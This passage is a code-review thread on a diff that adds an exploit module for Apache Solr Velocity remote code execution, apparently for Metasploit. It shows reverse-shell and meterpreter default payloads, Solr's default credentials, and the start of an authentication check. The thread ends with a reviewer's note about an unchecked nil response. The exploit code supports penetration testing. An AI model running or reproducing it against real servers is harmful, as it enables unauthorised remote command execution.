modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,377 @@
+                'Unix-based',
+                {
+                  'DefaultOptions' => { 'PAYLOAD'  => 'cmd/unix/reverse_bash' },
+                  'Arch'     => ARCH_CMD,
+                  'Platform' => 'Unix',
+                }
+              ],
+              [
+                'x86/x64 Windows',
+                {
+                  'DefaultOptions' => { 'PAYLOAD'  => 'windows/meterpreter/reverse_tcp' },
+                  'Arch'     => [ARCH_X86, ARCH_X64],
+                  'Platform' => 'Windows',
+                }
+              ]
+            ],
+        'DisclosureDate' => "Oct 29 2019",
+        'DefaultOptions' => { 'TARGET'  => 1 },
+        'Privileged'     => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8983),
+        OptString.new('USERNAME', [false, 'Solr username (default is solr)', 'solr']),
+        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
+      ]
+    )
+    deregister_options('URIPATH')
+    deregister_options('SRVHOST')
+    deregister_options('SRVPORT')
+  end
+
+  # are we just checking? or are we exploiting?
+  @vuln_check = true
+  # if we are just checking, we only need one core to be exploitable
+  @core_name = ""
+  # OS specific stuff
+  @target_platform = ""
+  @target_arch = ""
+  # has the switch been flicked?
+  @params_resource_loader_enabled = false
+  # if authentication is used
+  @auth_string = ""
+
+  # check for vulnerability existence
+  def check
+    # see if authentication is required for the specified Solr instance
+    auth_check = send_request_cgi({
+                 'method'  => 'GET',
+                 'headers' => { 'Connection' => 'Keep-Alive' },
+                 'uri'     => '/solr/'
+      })
+
+    # successfully connected?
+    unless auth_check
+      return CheckCode::Unknown('Connection failed!')
+    end
+
+    # if return code is not 200, then the Solr instance definitely requires authentication
+    unless auth_check.code == 200
+      print_warning("Authentication required for #{peer}!")
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
+        print_error("Credentials not provided, skipping credentialed check...")
+        return CheckCode::Unknown
+      # otherwise, attempt authentication
+      else
+
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        unless attempt_auth.code == 200
```

Comment:
`attempt_auth` could be `nil`. Check first.

Reply:
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.